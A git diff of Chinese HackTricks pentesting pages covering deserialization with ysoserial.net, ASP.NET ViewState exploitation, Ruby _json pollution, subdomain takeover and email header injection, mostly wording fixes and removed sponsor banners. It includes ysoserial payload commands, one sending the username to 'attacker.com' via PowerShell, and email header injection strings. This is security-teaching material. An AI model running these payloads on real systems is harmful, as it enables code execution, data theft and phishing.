-工具[JMET](https://github.com/matthiaskaiser/jmet)被创建用于**连接和攻击这些服务,发送多个使用已知gadget序列化的恶意对象**。这些利用将在服务仍然存在漏洞且任何使用的gadget在易受攻击的应用程序中时有效。
+工具 [JMET](https://github.com/matthiaskaiser/jmet) 被创建用于 **连接和攻击这些服务,发送多个使用已知 gadget 的恶意序列化对象**。这些利用将在服务仍然存在漏洞且所使用的任何 gadget 在易受攻击的应用程序中时有效。
 
 ### 参考文献
 
-- JMET讲座:[https://www.youtube.com/watch?v=0h8DWiOWGGA](https://www.youtube.com/watch?v=0h8DWiOWGGA)
+- JMET 讲座:[https://www.youtube.com/watch?v=0h8DWiOWGGA](https://www.youtube.com/watch?v=0h8DWiOWGGA)
 - 幻灯片:[https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf)
 
 ## .Net
 
-在.Net的上下文中,反序列化利用以类似于Java的方式操作,其中gadget被利用以在反序列化对象时运行特定代码。
+在 .Net 的上下文中,反序列化利用以类似于 Java 的方式操作,其中利用 gadget 在反序列化对象时运行特定代码。
 
 ### 指纹
 
@@ -639,28 +639,28 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
 
 #### 黑盒
 
-搜索应针对Base64编码字符串**AAEAAAD/////**或任何可能在服务器端进行反序列化的类似模式,从而控制要反序列化的类型。这可能包括但不限于包含`TypeObject`或`$type`的**JSON**或**XML**结构。
+搜索应针对 Base64 编码字符串 **AAEAAAD/////** 或任何类似模式,这可能会在服务器端进行反序列化,从而控制要反序列化的类型。这可能包括但不限于包含 `TypeObject` 或 `$type` 的 **JSON** 或 **XML** 结构。
 
 ### ysoserial.net
 
-在这种情况下,您可以使用工具[**ysoserial.net**](https://github.com/pwntester/ysoserial.net)来**创建反序列化利用**。下载git存储库后,您应使用Visual Studio等编译该工具。
+在这种情况下,您可以使用工具 [**ysoserial.net**](https://github.com/pwntester/ysoserial.net) 来 **创建反序列化利用**。下载 git 仓库后,您应该 **使用 Visual Studio 等编译该工具**。
 
-如果您想了解**ysoserial.net是如何创建其利用的**,您可以[**查看此页面,其中解释了ObjectDataProvider gadget + ExpandedWrapper + Json.Net格式化程序**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md)。
+如果您想了解 **ysoserial.net 如何创建其利用**,您可以 [**查看此页面,其中解释了 ObjectDataProvider gadget + ExpandedWrapper + Json.Net 格式化程序**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md)。
 
-**ysoserial.net**的主要选项有:**`--gadget`**、**`--formatter`**、**`--output`**和**`--plugin`**。
+**ysoserial.net** 的主要选项包括:**`--gadget`**、**`--formatter`**、**`--output`** 和 **`--plugin`**。
 
-- **`--gadget`**用于指示要滥用的gadget(指示在反序列化期间将被滥用以执行命令的类/函数)。
+- **`--gadget`** 用于指示要滥用的 gadget(指示在反序列化期间将被滥用以执行命令的类/函数)。
 - **`--formatter`**,用于指示序列化利用的方法(您需要知道后端使用哪个库来反序列化有效负载,并使用相同的库进行序列化)
-- **`--output`**用于指示您希望以**原始**或**base64**编码的形式获得利用。_请注意,**ysoserial.net**将使用**UTF-16LE**(Windows上默认使用的编码)对有效负载进行**编码**,因此如果您从Linux控制台获取原始数据并仅对其进行编码,您可能会遇到一些**编码兼容性问题**,这将导致利用无法正常工作(在HTB JSON框中,有效负载在UTF-16LE和ASCII中均有效,但这并不意味着它总是有效)。_
-- **`--plugin`**ysoserial.net支持插件以制作**特定框架的利用**,如ViewState
+- **`--output`** 用于指示您是否希望以 **raw** 或 **base64** 编码的形式获得利用。_请注意,**ysoserial.net** 将使用 **UTF-16LE** 编码有效负载(Windows 默认使用的编码),因此如果您从 Linux 控制台获取原始数据并仅对其进行编码,可能会遇到一些 **编码兼容性问题**,这将导致利用无法正常工作(在 HTB JSON 框中,有效负载在 UTF-16LE 和 ASCII 中均有效,但这并不意味着它总是有效)。_
+- **`--plugin`** ysoserial.net 支持插件以制作 **特定框架的利用**,如 ViewState
 
-#### 更多ysoserial.net参数
+#### 更多 ysoserial.net 参数
 
-- `--minify`将提供一个**更小的有效负载**(如果可能)
-- `--raf -f Json.Net -c "anything"`这将指示可以与提供的格式化程序(在这种情况下为`Json.Net`)一起使用的所有gadget
-- `--sf xml`您可以**指示一个gadget**(`-g`),ysoserial.net将搜索包含“xml”的格式化程序(不区分大小写)
+- `--minify` 将提供一个 **更小的有效负载**(如果可能)
+- `--raf -f Json.Net -c "anything"` 这将指示可以与提供的格式化程序(在这种情况下为 `Json.Net`)一起使用的所有 gadget
+- `--sf xml` 您可以 **指示一个 gadget**(`-g`),ysoserial.net 将搜索包含 "xml" 的格式化程序(不区分大小写)
 
-**ysoserial示例**以创建利用:
+**ysoserial 示例** 用于创建利用:
 ```bash
 #Send ping
 ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -n 5 10.10.14.44" -o base64
@@ -819,14 +819,14 @@ puts Base64.encode64(payload)
 
 ### Ruby .send() 方法
 
-正如在 [**此漏洞报告**](https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/) 中所解释的,如果某些用户未经过滤的输入到达 ruby 对象的 `.send()` 方法,该方法允许 **调用对象的任何其他方法**,并带有任何参数。
+正如在 [**此漏洞报告**](https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/) 中所解释的,如果某些用户未经过滤的输入到达 ruby 对象的 `.send()` 方法,该方法允许 **调用对象的任何其他方法**,并使用任何参数。
 
 例如,调用 eval 然后将 ruby 代码作为第二个参数将允许执行任意代码:
 ```ruby
 .send('eval', '') == RCE
 ```
 此外,如果只有一个参数被攻击者控制,如前面的写作中提到的,可以调用对象的任何**不需要参数**或其参数具有**默认值**的方法。\
-为此,可以枚举对象的所有方法,以**找到满足这些要求的一些有趣方法**。
+为此,可以枚举对象的所有方法以**找到满足这些要求的一些有趣方法**。
 ```ruby
 .send('')
 
@@ -848,13 +848,23 @@ candidate_methods = repo_methods.select() do |method_name|
 end
 candidate_methods.length() # Final number of methods=> 3595
 ```
+### Ruby 类污染
+
+检查如何可能 [污染 Ruby 类并在这里滥用它](ruby-class-pollution.md)。
+
+### Ruby _json 污染
+
+当发送一些不可哈希的值如数组时,它们将被添加到一个名为 `_json` 的新键中。然而,攻击者也可以在请求体中设置一个名为 `_json` 的值,包含他希望的任意值。然后,如果后端例如检查一个参数的真实性,但又使用 `_json` 参数执行某些操作,则可能会发生授权绕过。
+
+在 [Ruby _json 污染页面](ruby-_json-pollution.md) 中查看更多信息。
+
 ### 其他库
 
-此技术取自[ **这篇博客文章**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared)。
+此技术取自 [**这篇博客文章**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared)。
 
-还有其他 Ruby 库可以用来序列化对象,因此可以被滥用以在不安全的反序列化中获得 RCE。以下表格显示了一些这些库及其在反序列化时调用的加载库的方法(基本上是滥用以获得 RCE 的函数):
+还有其他 Ruby 库可以用来序列化对象,因此可以被滥用以在不安全的反序列化期间获得 RCE。下表显示了一些这些库及其在反序列化时调用的加载库中的方法(基本上是滥用以获得 RCE 的函数):
 
-
输入数据类内部启动方法
Marshal (Ruby)二进制_load
OjJSONhash(类需要作为键放入 hash(map) 中)
OxXMLhash(类需要作为键放入 hash(map) 中)
Psych (Ruby)YAMLhash(类需要作为键放入 hash(map) 中)
init_with
JSON (Ruby)JSONjson_create([请参阅关于 json_create 的说明](#table-vulnerable-sinks))

+
输入数据类内部启动方法
Marshal (Ruby)二进制_load
OjJSONhash (类需要作为键放入哈希(映射)中)
OxXMLhash (类需要作为键放入哈希(映射)中)
Psych (Ruby)YAMLhash (类需要作为键放入哈希(映射)中)
init_with
JSON (Ruby)JSONjson_create ([查看关于 json_create 的注释在末尾](#table-vulnerable-sinks))

 
 基本示例:
 ```ruby
@@ -878,7 +888,7 @@ puts json_payload
 # Sink vulnerable inside the code accepting user input as json_payload
 Oj.load(json_payload)
 ```
-在尝试滥用 Oj 的情况下,可以找到一个小工具类,它在其 `hash` 函数中会调用 `to_s`,而 `to_s` 会调用 spec,进而调用 fetch_path,这使得它能够获取一个随机 URL,从而很好地检测这些未清理的反序列化漏洞。
+在尝试滥用 Oj 的情况下,可以找到一个小工具类,它在其 `hash` 函数内部会调用 `to_s`,这将调用 spec,进而调用 fetch_path,这使得它能够获取一个随机 URL,从而很好地检测这些未清理的反序列化漏洞。
 ```json
 {
 "^o": "URI::HTTP",
diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
index 0f74ba5b0..cffa6ed93 100644
--- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
+++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
@@ -2,33 +2,27 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
-
 ## 什么是 ViewState
 
-**ViewState** 是 ASP.NET 中用于在网页之间保持页面和控件数据的默认机制。在渲染页面的 HTML 时,页面的当前状态和在回发期间要保留的值被序列化为 base64 编码的字符串。这些字符串随后被放置在隐藏的 ViewState 字段中。
+**ViewState** 是 ASP.NET 中用于在网页之间维护页面和控件数据的默认机制。在渲染页面的 HTML 时,页面的当前状态和在回发期间要保留的值被序列化为 base64 编码的字符串。这些字符串随后被放置在隐藏的 ViewState 字段中。
 
 ViewState 信息可以通过以下属性或其组合来表征:
 
-- **Base64**:
+- **Base64**:
 - 当 `EnableViewStateMac` 和 `ViewStateEncryptionMode` 属性都设置为 false 时,使用此格式。
-- **Base64 + MAC(消息认证码)启用**:
+- **Base64 + MAC(消息认证码)启用**:
 - 通过将 `EnableViewStateMac` 属性设置为 true 来激活 MAC。这为 ViewState 数据提供完整性验证。
-- **Base64 + 加密**:
+- **Base64 + 加密**:
 - 当 `ViewStateEncryptionMode` 属性设置为 true 时应用加密,以确保 ViewState 数据的机密性。
 
 ## 测试用例
 
-该图像是一个表,详细说明了基于 .NET 框架版本的 ASP.NET 中 ViewState 的不同配置。以下是内容摘要:
+该图像是一个表,详细说明了基于 .NET 框架版本的 ASP.NET 中 ViewState 的不同配置。以下是内容的摘要:
 
 1. 对于 **任何版本的 .NET**,当 MAC 和加密都被禁用时,不需要 MachineKey,因此没有适用的方法来识别它。
 2. 对于 **4.5 版本以下**,如果启用了 MAC 但未启用加密,则需要 MachineKey。识别 MachineKey 的方法称为 "Blacklist3r"。
 3. 对于 **4.5 版本以下**,无论 MAC 是否启用,如果启用了加密,则需要 MachineKey。识别 MachineKey 是 "Blacklist3r - Future Development" 的任务。
-4. 对于 **4.5 版本及以上**,所有 MAC 和加密的组合(无论两者都为 true,还是一个为 true 另一个为 false)都需要 MachineKey。可以使用 "Blacklist3r" 识别 MachineKey。
+4. 对于 **4.5 版本及以上**,所有 MAC 和加密的组合(无论两者都为 true,还是一个为 true 另一个为 false)都需要 MachineKey。可以使用 "Blacklist3r" 来识别 MachineKey。
 
 ### 测试用例:1 – EnableViewStateMac=false 和 viewStateEncryptionMode=false
 
@@ -50,7 +44,7 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
 
 ### Test Case: 2 – .Net < 4.5 and EnableViewStateMac=true & ViewStateEncryptionMode=false
 
-为了**启用 ViewState MAC**,我们需要在特定的 aspx 文件上进行以下更改:
+为了**为特定页面启用 ViewState MAC**,我们需要在特定的 aspx 文件中进行以下更改:
 ```bash
 <%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>
 ```
@@ -110,29 +104,29 @@ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Inv
 ```
 ### 测试用例:3 – .Net < 4.5 和 EnableViewStateMac=true/false 和 ViewStateEncryptionMode=true
 
-在这种情况下,不知道该参数是否受到MAC保护。因此,值可能被加密,您将**需要机器密钥来加密您的有效负载**以利用该漏洞。
+在这种情况下,不知道参数是否受到 MAC 保护。因此,值可能是加密的,您将**需要机器密钥来加密您的有效负载**以利用该漏洞。
 
 **在这种情况下,** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **模块正在开发中...**
 
-**在 .NET 4.5 之前,** ASP.NET 可以**接受**来自用户的**未加密** \_`__VIEWSTATE`\_ 参数,即使**`ViewStateEncryptionMode`**已设置为_**始终**_。ASP.NET **仅检查**请求中**`__VIEWSTATEENCRYPTED`**参数的**存在**。**如果删除此参数并发送未加密的有效负载,它仍然会被处理。**
+**在 .NET 4.5 之前,** ASP.NET 可以**接受**来自用户的**未加密** \_`__VIEWSTATE`\_ 参数,即使**`ViewStateEncryptionMode`** 已设置为 _**始终**_。ASP.NET **仅检查**请求中**`__VIEWSTATEENCRYPTED`** 参数的**存在**。**如果删除此参数并发送未加密的有效负载,它仍然会被处理。**
 
-因此,如果攻击者通过其他漏洞(如文件遍历)找到获取机器密钥的方法,可以使用在**案例 2**中使用的[**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)命令,通过ViewState反序列化漏洞执行RCE。
+因此,如果攻击者通过其他漏洞(如文件遍历)找到获取机器密钥的方法,可以使用在**案例 2**中使用的 [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) 命令,通过 ViewState 反序列化漏洞执行 RCE。
 
-- 从请求中删除`__VIEWSTATEENCRYPTED`参数,以利用ViewState反序列化漏洞,否则将返回Viewstate MAC验证错误,利用将失败。
+- 从请求中删除 `__VIEWSTATEENCRYPTED` 参数,以利用 ViewState 反序列化漏洞,否则将返回 Viewstate MAC 验证错误,利用将失败。
 
-### 测试用例:4 – .Net >= 4.5 和 EnableViewStateMac=true/false 和 ViewStateEncryptionMode=true/false,除了两个属性为false
+### 测试用例:4 – .Net >= 4.5 和 EnableViewStateMac=true/false 和 ViewStateEncryptionMode=true/false,除了两个属性为 false
 
-我们可以通过在web.config文件中指定以下参数来强制使用ASP.NET框架,如下所示。
+我们可以通过在 web.config 文件中指定以下参数来强制使用 ASP.NET 框架,如下所示。
 ```xml
 
 ```
-另外,这可以通过在 web.config 文件的 `machineKey` 参数中指定以下选项来完成。
+另外,可以通过在 web.config 文件的 `machineKey` 参数中指定以下选项来完成此操作。
 ```bash
 compatibilityMode="Framework45"
 ```
 如前所述,**值是加密的。** 然后,要发送**有效的有效负载,攻击者需要密钥**。
 
-您可以尝试使用 [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) 来查找正在使用的密钥:
+您可以尝试使用 [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)来查找正在使用的密钥:
 ```
 AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate  --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"
 
@@ -153,16 +147,16 @@ python examples/blacklist3r.py --viewstate JLFYOOegbdXmPjQou22oT2IxUwCAzSA9EAxD6
 ```
 ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2"  --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
 ```
-如果你有 `__VIEWSTATEGENERATOR` 的值,你可以尝试使用 `--generator` 参数并省略 `--path` 和 `--apppath` 参数。
+如果您拥有 `__VIEWSTATEGENERATOR` 的值,您可以尝试使用 `--generator` 参数并省略 `--path` 和 `--apppath` 参数。
 
 ![](https://notsosecure.com/sites/all/assets/group/nss_uploads/2019/06/4.2.png)
 
-成功利用 ViewState 反序列化漏洞将导致向攻击者控制的服务器发出带有用户名的带外请求。这种利用方式在一个概念验证(PoC)中得到了展示,该 PoC 可以通过名为 "Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET" 的资源找到。有关利用过程如何工作的更多细节,以及如何使用像 Blacklist3r 这样的工具来识别 MachineKey,你可以查看提供的 [PoC of Successful Exploitation](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC)。
+成功利用 ViewState 反序列化漏洞将导致向攻击者控制的服务器发出带有用户名的带外请求。这种利用方式在一个概念验证(PoC)中得到了演示,该 PoC 可以通过名为 "Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET" 的资源找到。有关利用过程如何工作的更多细节,以及如何使用像 Blacklist3r 这样的工具来识别 MachineKey,您可以查看提供的 [PoC of Successful Exploitation](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC)。
 
-### 测试用例 6 – ViewStateUserKeys 正在使用中
+### 测试用例 6 – 使用 ViewStateUserKeys
 
-**ViewStateUserKey** 属性可以用来 **防御** **CSRF 攻击**。如果在应用程序中定义了这样的密钥,并且我们尝试使用到目前为止讨论的方法生成 **ViewState** 有效负载,**有效负载将不会被应用程序处理**。\
-你需要使用一个额外的参数来正确创建有效负载:
+**ViewStateUserKey** 属性可以用来 **防御** **CSRF 攻击**。如果在应用程序中定义了这样的密钥,并且我们尝试使用到目前为止讨论的方法生成 **ViewState** 有效负载,则 **有效负载将不会被应用程序处理**。\
+您需要使用一个额外的参数来正确创建有效负载:
 ```bash
 --viewstateuserkey="randomstringdefinedintheserver"
 ```
@@ -179,10 +173,6 @@ ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe In
 - [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
 - [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
 
-

 
-**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/deserialization/ruby-_json-pollution.md b/src/pentesting-web/deserialization/ruby-_json-pollution.md
new file mode 100644
index 000000000..19e3b867a
--- /dev/null
+++ b/src/pentesting-web/deserialization/ruby-_json-pollution.md
@@ -0,0 +1,21 @@
+# Ruby _json 污染
+
+{{#include ../../banners/hacktricks-training.md}}
+
+这是来自帖子 [https://nastystereo.com/security/rails-_json-juggling-attack.html](https://nastystereo.com/security/rails-_json-juggling-attack.html) 的摘要
+
+
+## 基本信息
+
+当发送一个包含一些不可哈希值(如数组)的主体时,它们将被添加到一个名为 `_json` 的新键中。然而,攻击者也可以在主体中设置一个名为 `_json` 的值,并填入他希望的任意值。然后,如果后端例如检查一个参数的真实性,但又使用 `_json` 参数执行某些操作,则可能会发生授权绕过。
+```json
+{
+"id": 123,
+"_json": [456, 789]
+}
+```
+## 参考
+
+- [https://nastystereo.com/security/rails-_json-juggling-attack.html](https://nastystereo.com/security/rails-_json-juggling-attack.html)
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/domain-subdomain-takeover.md b/src/pentesting-web/domain-subdomain-takeover.md
index cf776b3b8..658352866 100644
--- a/src/pentesting-web/domain-subdomain-takeover.md
+++ b/src/pentesting-web/domain-subdomain-takeover.md
@@ -2,21 +2,14 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=domain-subdomain-takeover) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=domain-subdomain-takeover" %}
 
 ## 域名接管
 
-如果你发现某个域名 (domain.tld) **被某个服务使用在范围内**,但 **公司** 已经 **失去** 了对它的 **所有权**,你可以尝试 **注册** 它(如果价格足够便宜)并通知公司。如果这个域名接收一些 **敏感信息**,比如通过 **GET** 参数或在 **Referer** 头中的会话 cookie,这肯定是一个 **漏洞**。
+如果你发现某个域名 (domain.tld) **被某个服务使用在范围内**,但该 **公司** 已经 **失去** 了对它的 **所有权**,你可以尝试 **注册** 它(如果价格足够便宜)并通知公司。如果这个域名接收一些 **敏感信息**,比如通过 **GET** 参数或 **Referer** 头部的会话 cookie,这肯定是一个 **漏洞**。
 
 ### 子域名接管
 
-公司的一个子域名指向一个 **未注册名称的第三方服务**。如果你可以在这个 **第三方服务** 中 **创建** 一个 **账户** 并 **注册** 正在使用的 **名称**,你可以执行子域名接管。
+公司的一个子域名指向一个 **未注册名称的第三方服务**。如果你可以在这个 **第三方服务** 中 **创建** 一个 **账户** 并 **注册** 正在使用的 **名称**,你就可以进行子域名接管。
 
 有几个工具带有字典来检查可能的接管:
 
@@ -36,17 +29,17 @@
 
 ### 通过 DNS 通配符生成子域名接管
 
-当在一个域名中使用 DNS 通配符时,任何请求的子域名如果没有明确的不同地址,将会 **解析为相同的信息**。这可以是一个 A IP 地址,一个 CNAME...
+当在一个域名中使用 DNS 通配符时,任何请求的子域名如果没有明确的不同地址,将会 **解析为相同的信息**。这可以是 A IP 地址,CNAME...
 
 例如,如果 `*.testing.com` 被通配符指向 `1.1.1.1`。那么,`not-existent.testing.com` 将指向 `1.1.1.1`。
 
-然而,如果系统管理员不是指向一个 IP 地址,而是通过 CNAME 指向一个 **第三方服务**,例如一个 G**ithub 子域名**(例如 `sohomdatta1.github.io`)。攻击者可以 **创建他自己的第三方页面**(在 Gihub 中的情况)并声称 `something.testing.com` 指向那里。因为,**CNAME 通配符** 将同意攻击者能够 **为受害者的域名生成任意子域名指向他的页面**。
+然而,如果系统管理员不是指向一个 IP 地址,而是通过 CNAME 指向一个 **第三方服务**,比如一个 G**ithub 子域名**(例如 `sohomdatta1.github.io`)。攻击者可以 **创建他自己的第三方页面**(在 Gihub 中)并声称 `something.testing.com` 指向那里。因为,**CNAME 通配符** 将允许攻击者 **为受害者的域名生成任意子域名指向他的页面**。
 
 你可以在 CTF 文章中找到这个漏洞的例子:[https://ctf.zeyu2001.com/2022/nitectf-2022/undocumented-js-api](https://ctf.zeyu2001.com/2022/nitectf-2022/undocumented-js-api)
 
 ## 利用子域名接管
 
-子域名接管本质上是针对特定域名的 DNS 欺骗,允许攻击者为一个域名设置 A 记录,使浏览器显示来自攻击者服务器的内容。这种浏览器中的 **透明性** 使域名容易受到网络钓鱼攻击。攻击者可能会使用 [_typosquatting_](https://en.wikipedia.org/wiki/Typosquatting) 或 [_Doppelganger domains_](https://en.wikipedia.org/wiki/Doppelg%C3%A4nger) 来实现这一目的。尤其容易受到攻击的是那些在网络钓鱼邮件中看似合法的 URL,欺骗用户并因域名的固有信任而逃避垃圾邮件过滤器。
+子域名接管本质上是在互联网上对特定域名的 DNS 欺骗,允许攻击者为一个域名设置 A 记录,使浏览器显示来自攻击者服务器的内容。这种浏览器中的 **透明性** 使域名容易受到网络钓鱼攻击。攻击者可能会使用 [_typosquatting_](https://en.wikipedia.org/wiki/Typosquatting) 或 [_Doppelganger domains_](https://en.wikipedia.org/wiki/Doppelg%C3%A4nger) 来达到这个目的。特别容易受到攻击的是那些在网络钓鱼邮件中看似合法的 URL,欺骗用户并因域名的固有信任而逃避垃圾邮件过滤器。
 
 查看这个 [帖子以获取更多细节](https://0xpatrik.com/subdomain-takeover/)
 
@@ -60,37 +53,29 @@
 
 ### **电子邮件和子域名接管**
 
-子域名接管的另一个方面涉及电子邮件服务。攻击者可以操纵 **MX 记录** 来接收或发送来自合法子域名的电子邮件,从而增强网络钓鱼攻击的有效性。
+子域名接管的另一个方面涉及电子邮件服务。攻击者可以操纵 **MX 记录** 从合法子域名接收或发送电子邮件,从而增强网络钓鱼攻击的有效性。
 
 ### **更高的风险**
 
-进一步的风险包括 **NS 记录接管**。如果攻击者控制了一个域名的一个 NS 记录,他们可以潜在地将一部分流量引导到他们控制的服务器。如果攻击者为 DNS 记录设置了高 **TTL(生存时间)**,则这种风险会加大,延长攻击的持续时间。
+进一步的风险包括 **NS 记录接管**。如果攻击者控制了一个域名的 NS 记录,他们可以将一部分流量引导到他们控制的服务器。如果攻击者为 DNS 记录设置了高 **TTL(生存时间)**,则这种风险会加大,延长攻击的持续时间。
 
 ### CNAME 记录漏洞
 
-攻击者可能会利用指向不再使用或已停用的外部服务的未声明 CNAME 记录。这使他们能够在受信任的域名下创建一个页面,进一步促进网络钓鱼或恶意软件分发。
+攻击者可能会利用指向不再使用或已停用的外部服务的未声明 CNAME 记录。这使他们能够在受信任的域名下创建一个页面,进一步促进网络钓鱼或恶意软件传播。
 
 ### **缓解策略**
 
 缓解策略包括:
 
 1. **删除易受攻击的 DNS 记录** - 如果子域名不再需要,这种方法有效。
-2. **声明域名** - 在相应的云提供商处注册资源或重新购买过期域名。
+2. **声明域名** - 在相应的云服务提供商处注册资源或重新购买过期域名。
 3. **定期监控漏洞** - 像 [aquatone](https://github.com/michenriksen/aquatone) 这样的工具可以帮助识别易受攻击的域名。组织还应修订其基础设施管理流程,确保 DNS 记录的创建是资源创建的最后一步,而资源销毁的第一步。
 
-对于云提供商,验证域名所有权对于防止子域名接管至关重要。一些提供商,如 [GitLab](https://about.gitlab.com/2018/02/05/gitlab-pages-custom-domain-validation/),已经认识到这个问题并实施了域名验证机制。
+对于云服务提供商,验证域名所有权对于防止子域名接管至关重要。一些服务提供商,如 [GitLab](https://about.gitlab.com/2018/02/05/gitlab-pages-custom-domain-validation/),已经认识到这个问题并实施了域名验证机制。
 
 ## 参考文献
 
 - [https://0xpatrik.com/subdomain-takeover/](https://0xpatrik.com/subdomain-takeover/)
 - [https://www.stratussecurity.com/post/subdomain-takeover-guide](https://www.stratussecurity.com/post/subdomain-takeover-guide)
 
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=domain-subdomain-takeover) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=domain-subdomain-takeover" %}
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/email-injections.md b/src/pentesting-web/email-injections.md
index 6af25c5c2..fe7688a5c 100644
--- a/src/pentesting-web/email-injections.md
+++ b/src/pentesting-web/email-injections.md
@@ -1,16 +1,8 @@
 # 邮件注入
 
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-今天获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
-
 {{#include ../banners/hacktricks-training.md}}
 
-## 在发送的电子邮件中注入
+## 注入已发送邮件
 
 ### 在发件人参数后注入 Cc 和 Bcc
 ```
@@ -22,7 +14,7 @@ From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
 ```
 From:sender@domain.com%0ATo:attacker@domain.com
 ```
-消息将发送到原始收件人和攻击者账户。
+消息将发送给原始收件人和攻击者账户。
 
 ### 注入主题参数
 ```
@@ -32,7 +24,7 @@ From:sender@domain.com%0ASubject:This is%20Fake%20Subject
 
 ### 更改消息正文
 
-注入两个换行符,然后写下您的消息以更改消息的正文。
+注入一个两行换行符,然后写下您的消息以更改消息的正文。
 ```
 From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
 ```
@@ -106,7 +98,7 @@ Parameter #4 [  $additional_parameters ]
 
 如 [**本研究**](https://portswigger.net/research/splitting-the-email-atom) 中所述,电子邮件名称也可以包含编码字符:
 
-- **PHP 256 溢出**:PHP `chr` 函数将继续向字符添加 256,直到它变为正数,然后进行操作 `%256`。
+- **PHP 256 溢出**:PHP `chr` 函数将继续向字符添加 256,直到变为正数,然后进行操作 `%256`。
 - `String.fromCodePoint(0x10000 + 0x40) // 𐁀 → @`
 
 > [!TIP]
@@ -142,7 +134,7 @@ Parameter #4 [  $additional_parameters ]
 #punycode
 x@xn--svg/-9x6 → x@` 为 `=3e` 和 `null` 为 `=00` 
@@ -153,45 +145,45 @@ Payloads:
